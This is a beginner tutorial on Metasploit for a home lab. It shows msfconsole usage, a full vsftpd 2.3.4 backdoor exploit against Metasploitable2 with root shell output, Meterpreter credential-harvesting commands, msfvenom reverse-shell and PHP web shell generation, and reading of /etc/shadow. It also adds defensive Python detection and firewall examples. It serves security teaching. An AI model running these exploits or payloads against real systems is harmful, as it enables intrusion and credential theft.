🔐 Home lab only. Every command in this tutorial targets Metasploitable2 in your own isolated VirtualBox lab. Never run Metasploit against systems you do not own or have explicit written authorisation to test. Set up your legal lab first: Ethical Hacking Lab Setup at Home.
Metasploit is the tool that appears in every penetration testing course, every OSCP preparation guide, and every professional ethical hacker's toolkit. It contains over 2,300 exploit modules, 1,000 auxiliary modules, and hundreds of post-exploitation capabilities, and it is free. But most beginner Metasploit tutorials show you three commands and send you to figure out the rest yourself. This one does not. So let's start our complete Metasploit tutorial for beginners, covering msfconsole, Meterpreter commands, and examples.
This tutorial walks you through Metasploit Framework from the beginning — how the console works, how to find exploits, how to configure them, how to select payloads, what to do after getting a shell, and a complete end-to-end walkthrough from Nmap scan to root shell against Metasploitable2 in your home lab. Everything on your own machines, completely legal, entirely practical.
What Is Metasploit Framework?
Metasploit Framework (MSF) is an open-source penetration testing platform developed and maintained by Rapid7. It provides a structured environment for finding, configuring, and launching exploit modules against systems with known vulnerabilities. In a professional context, it is used after vulnerability scanning to demonstrate the real-world impact of identified weaknesses — proving that a vulnerability is exploitable, not just theoretically present.
FREE
Open source, pre-installed Kali
Framework Architecture — What the Modules Actually Are
EXPLOITS
Modules that take advantage of specific CVEs or vulnerabilities to gain access to a target. Examples: ms17_010_eternalblue, vsftpd_234_backdoor, samba_usermap_script.
PAYLOADS
Code that runs on the target after exploit success. Determines what you can do: shell access, Meterpreter session, file upload. Reverse payloads connect back to you. Bind payloads open a listener on the target.
AUXILIARY
Scanning, fuzzing, and information-gathering tools. Port scanners, service probers, credential brute-forcers, denial-of-service testers. No payload required — used for reconnaissance and verification.
POST
Post-exploitation modules run after gaining access. Privilege escalation, credential harvesting, persistence, pivoting to other systems. Run from within Meterpreter sessions.
ENCODERS
Modify payload encoding to evade antivirus signature detection. Used with msfvenom when generating standalone payloads. Modern AV often detects encoded payloads — use sparingly.
NOPS
No-Operation sleds used in buffer overflow exploits. Less relevant for modern exploitation — primarily used in traditional binary exploitation scenarios taught in OSCP preparation.
msfconsole — Core Navigation Commands
msfconsole: Core Commands Reference
msf6 > help # List all commands
msf6 > search vsftpd # Search for modules by name/CVE/type
msf6 > search type:exploit platform:linux # Filter by type and platform
msf6 > use exploit/unix/ftp/vsftpd_234_backdoor
msf6 exploit(vsftpd) > info # Detailed module info + CVE + targets
msf6 exploit(vsftpd) > show options # Required + optional settings
msf6 exploit(vsftpd) > show payloads # Compatible payloads
msf6 exploit(vsftpd) > show targets # Target OS/version variations
msf6 exploit(vsftpd) > set RHOSTS 192.168.56.101 # Target IP
msf6 exploit(vsftpd) > set LHOST 192.168.56.1 # Your IP (for reverse shells)
msf6 exploit(vsftpd) > set PAYLOAD cmd/unix/interact
msf6 exploit(vsftpd) > check # Check if target is vulnerable (when supported)
msf6 exploit(vsftpd) > run # Execute the exploit
msf6 exploit(vsftpd) > back # Return to main msf6 > prompt
msf6 > sessions -l # List all active sessions
msf6 > sessions -i 1 # Interact with session 1
msf6 > db_nmap -sV 192.168.56.101 # Run Nmap and store results in MSF DB
msfconsole Core Commands — The commands you use on every Metasploit session: search (find modules), use (select), info/show options (review), set (configure), run (execute), sessions (manage). The db_nmap command runs Nmap and imports results directly into the Metasploit database for use with exploit modules.
Your First Exploit — VSFTPD 2.3.4 Backdoor on Metasploitable2
VSFTPD 2.3.4 is a famous example of a backdoor intentionally (or accidentally) introduced into an FTP server package. When a user connects with a username containing a smiley face (:)), the backdoor opens a shell on port 6200. Metasploitable2 runs this exact version — it is your legal practice target.
First, set up your home lab with both Kali Linux and Metasploitable2 in VirtualBox. The Metasploitable Labs hub has additional walkthroughs for every vulnerable service on the target.
# ─── STEP 1: Confirm Metasploitable is running and find its IP ──
$ nmap -sn 192.168.56.0/24
# Your Metasploitable IP appears, typically 192.168.56.101
# ─── STEP 2: Run service scan to confirm vsftpd 2.3.4 ────────
$ sudo nmap -sV -p 21 192.168.56.101
21/tcp open ftp vsftpd 2.3.4
# ─── STEP 3: Start msfconsole and find the exploit ──────────
$ sudo msfconsole
msf6 > search vsftpd 2.3.4
Matching Modules:
0 exploit/unix/ftp/vsftpd_234_backdoor … Excellent
# ─── STEP 4: Use, configure, and exploit ─────────────────────
msf6 > use exploit/unix/ftp/vsftpd_234_backdoor
msf6 exploit(vsftpd) > set RHOSTS 192.168.56.101
msf6 exploit(vsftpd) > run
[*] Command shell session 1 opened (192.168.56.1:49322 → 192.168.56.101:6200)
id
uid=0(root) gid=0(root) groups=0(root)
# Root shell obtained on your own Metasploitable2 VM ✓
Key concept: The exploit worked because VSFTPD 2.3.4 contains a backdoor, a deliberate vulnerability. “Excellent” reliability in the search results means it works consistently when the target runs the vulnerable version. Always verify the target service version with Nmap before running an exploit. See our full Nmap tutorial: Day 1: Nmap Tutorial.
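Seen from the monitoring side, the two facts described above (a `:)` in the FTP username, then a shell on port 6200) make a simple correlation rule. The Python below is an added example, not part of the original tutorial; the event format, the 30-second window and the sample lines are constructed for illustration.

```python
from datetime import datetime, timedelta

# Constructed sample events (not from a real capture). Fields:
# timestamp, client IP, server IP, server port, event text.
SAMPLE_EVENTS = """\
2024-05-01T10:00:01 192.168.56.1 192.168.56.101 21 FTP USER anonymous
2024-05-01T10:00:05 192.168.56.1 192.168.56.101 21 FTP USER lab:)
2024-05-01T10:00:06 192.168.56.1 192.168.56.101 6200 TCP SYN
2024-05-01T10:09:00 192.168.56.7 192.168.56.101 6200 TCP SYN
2024-05-01T10:10:00 192.168.56.7 192.168.56.102 21 FTP USER smile:)
"""

TRIGGER = ":)"                  # sequence in the username, per the text above
BACKDOOR_PORT = 6200            # port the backdoor shell opens, per the text above
WINDOW = timedelta(seconds=30)  # assumed correlation window


def parse(line):
    """Split one constructed event line into typed fields."""
    ts, client, server, port, text = line.split(" ", 4)
    return datetime.fromisoformat(ts), client, server, int(port), text


def detect(log_text):
    """Return (severity, server, reason) tuples in event order."""
    alerts = []
    triggers = {}  # server IP -> time of the last ':)' login attempt
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, _client, server, port, text = parse(line)
        if port == 21 and text.startswith("FTP USER ") and TRIGGER in text[9:]:
            triggers[server] = ts
            alerts.append(("medium", server, "FTP username contains ':)'"))
        elif port == BACKDOOR_PORT:
            seen = triggers.get(server)
            if seen is not None and ts - seen <= WINDOW:
                alerts.append(("high", server, "port 6200 connection after ':)' login"))
            else:
                alerts.append(("low", server, "port 6200 connection without trigger"))
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

The "high" alert only fires when both halves of the sequence hit the same server inside the window; a lone connection to port 6200 stays "low" because other software can legitimately use that port.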
Meterpreter — Advanced Post-Exploitation
Most exploits give you a basic command shell. Meterpreter is an advanced payload that gives you a rich interactive session running entirely in memory — no files written to disk, encrypted communication back to your handler. It is the preferred payload for post-exploitation demonstrations in penetration tests.
Meterpreter Session: Post-Exploitation Command Reference
# ─── SYSTEM INFORMATION ──────────────────────────────────────
meterpreter > sysinfo # OS name, hostname, architecture
meterpreter > getuid # Current user context
meterpreter > getpid # Process ID of Meterpreter
meterpreter > ps # List all running processes
# ─── PRIVILEGE ESCALATION ────────────────────────────────────
meterpreter > getsystem # Attempt privilege escalation
meterpreter > run post/multi/recon/local_exploit_suggester # Suggest local exploits
# ─── CREDENTIAL HARVESTING ───────────────────────────────────
meterpreter > hashdump # Extract /etc/shadow hashes (root required)
meterpreter > run post/linux/gather/hashdump
# ─── FILE SYSTEM ─────────────────────────────────────────────
meterpreter > pwd # Current directory on target
meterpreter > ls # List files
meterpreter > download /etc/passwd # Download file from target
meterpreter > upload tool.sh /tmp/ # Upload file to target
# ─── SESSION MANAGEMENT ──────────────────────────────────────
meterpreter > shell # Drop to native system shell
meterpreter > background # Background session (CTRL+Z)
meterpreter > exit # Close session
Meterpreter Post-Exploitation Commands — These are the commands used in real penetration test engagements to demonstrate impact after initial access. sysinfo and getuid establish context. getsystem attempts privilege escalation. hashdump extracts password hashes for offline cracking. download retrieves files as evidence. All for authorised testing only.
Payloads — Reverse Shell vs Bind Shell
→ REVERSE SHELL (Most Common)
Target connects back to your listener. You start a listener first (LHOST + LPORT), then exploit runs and the target calls home. Works through most firewalls since the connection initiates outbound from the target.
windows/meterpreter/reverse_tcp
linux/x64/meterpreter/reverse_tcp
← BIND SHELL
Target opens a port and waits for you to connect. You connect to the target after the exploit runs. Simpler setup but requires the target port to be reachable — often blocked by firewalls. Less common in real engagements.
windows/meterpreter/bind_tcp
linux/x64/meterpreter/bind_tcp
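The firewall behaviour described above can be checked with a small model: an inbound-only policy stops the bind-shell connection but lets the reverse-shell callback out, while adding an egress allowlist stops both. This Python is an added example, not from the original tutorial; the two policies, the resolver address 192.168.56.10 and the flow list are constructed assumptions.

```python
SERVER = "192.168.56.101"   # lab target address used on this page

# Two constructed firewall policies for SERVER (assumed values).
INBOUND_ONLY = {
    "inbound_ports": {21, 22, 139, 3306},   # services the host is meant to expose
    "egress": None,                         # None = all outbound traffic allowed
}
WITH_EGRESS = {
    "inbound_ports": {21, 22, 139, 3306},
    "egress": {("192.168.56.10", 53)},      # only the (assumed) DNS resolver
}

# Constructed flows: (initiator IP, responder IP, responder port, label)
FLOWS = [
    ("192.168.56.1", SERVER, 22, "admin ssh"),
    (SERVER, "192.168.56.10", 53, "dns lookup"),
    (SERVER, "192.168.56.1", 4444, "reverse shell callback"),
    ("192.168.56.1", SERVER, 4444, "bind shell connect"),
]


def allowed(policy, initiator, responder, port):
    """Stateful firewall model: only the connection's first packet is judged."""
    if responder == SERVER:                 # inbound to the server
        return port in policy["inbound_ports"]
    if initiator == SERVER:                 # outbound from the server
        egress = policy["egress"]
        return egress is None or (responder, port) in egress
    return True                             # traffic that does not involve SERVER


def evaluate(policy):
    """Map each flow label to True (passes) or False (blocked)."""
    return {label: allowed(policy, i, r, p) for i, r, p, label in FLOWS}


if __name__ == "__main__":
    for name, policy in (("inbound-only", INBOUND_ONLY), ("with egress", WITH_EGRESS)):
        print(name, evaluate(policy))
```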
msfvenom — Generate Standalone Payloads
msfvenom creates standalone payload files — executables, scripts, or shellcode — that you can deliver to a target and run. In penetration testing this is used to demonstrate client-side attack paths: phishing simulations, USB drops, or file-based delivery on authorised tests.
# Windows reverse Meterpreter executable
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4444 -f exe -o payload.exe
# Linux reverse Meterpreter ELF binary
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4444 -f elf -o payload.elf
# PHP web shell
msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.56.1 LPORT=4444 -f raw -o shell.php
# Start multi/handler listener to catch the reverse shell
msf6 > use exploit/multi/handler
msf6 > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf6 > set LHOST 192.168.56.1
msf6 > set LPORT 4444
msf6 > run
Full Lab Walkthrough — Nmap to Root on Metasploitable2
This is the complete beginner workflow: start from a blank Kali terminal, scan the target, find a vulnerability, exploit it, and demonstrate post-exploitation impact. Everything against your own Metasploitable2 VM.
# ═══ PHASE 1: RECONNAISSANCE ══════════════════════════════════
$ sudo nmap -sV -sC --top-ports 1000 -oA metasploitable_scan 192.168.56.101
21/tcp open ftp vsftpd 2.3.4 ← Backdoored FTP
22/tcp open ssh OpenSSH 4.7p1
139/tcp open netbios Samba smbd 3.X ← CVE-2007-2447
3306/tcp open mysql MySQL 5.0.51a ← Empty root password
# ═══ PHASE 2: EXPLOITATION (vsftpd backdoor) ══════════════════
$ sudo msfconsole
msf6 > use exploit/unix/ftp/vsftpd_234_backdoor
msf6 > set RHOSTS 192.168.56.101
msf6 > run
[*] Command shell session 1 opened
# ═══ PHASE 3: POST-EXPLOITATION ═══════════════════════════════
whoami → root
cat /etc/shadow → root:$1$… [password hashes extracted]
uname -a → Linux metasploitable 2.6.24-16-server
# ═══ PHASE 4: DOCUMENT FOR REPORT ════════════════════════════
# Screenshot each phase. Note: vuln found (vsftpd 2.3.4),
# exploit used (backdoor), evidence obtained (root shell, /etc/shadow)
# Severity: CRITICAL — unauthenticated remote root shell
Frequently Asked Questions – Metasploit Tutorial for Beginners
What is Metasploit Framework?
Open-source penetration testing platform with 2,300+ exploit modules, payloads, auxiliary tools, and post-exploitation modules. Pre-installed on Kali Linux. Required for OSCP certification. Used by security professionals globally for authorised vulnerability assessment.
Is Metasploit legal to use?
Legal on systems you own or have explicit written authorisation to test: your home lab VMs, Metasploitable2, authorised pentest targets, TryHackMe, Hack The Box. Illegal against any system without authorisation regardless of intent.
What is Meterpreter?
Advanced Metasploit payload running entirely in memory — no files written to disk, encrypted communication. Provides rich post-exploitation interface: sysinfo, getuid, getsystem, hashdump, upload/download, shell access. Preferred payload for demonstration engagements.
What is Metasploitable2?
Intentionally vulnerable Linux VM by Rapid7 for Metasploit training. Contains dozens of vulnerable services deliberately — VSFTPD 2.3.4 backdoor, Samba CVE-2007-2447, weak MySQL, UnrealIRCD backdoor, and more. Legal to attack since you own it.
What is the difference between an exploit and a payload?
Exploit: the mechanism that takes advantage of a vulnerability to deliver the payload. Payload: the code that runs on the target after the exploit succeeds — determines what access you have. Reverse payloads connect back to your listener. Bind payloads open a port on the target.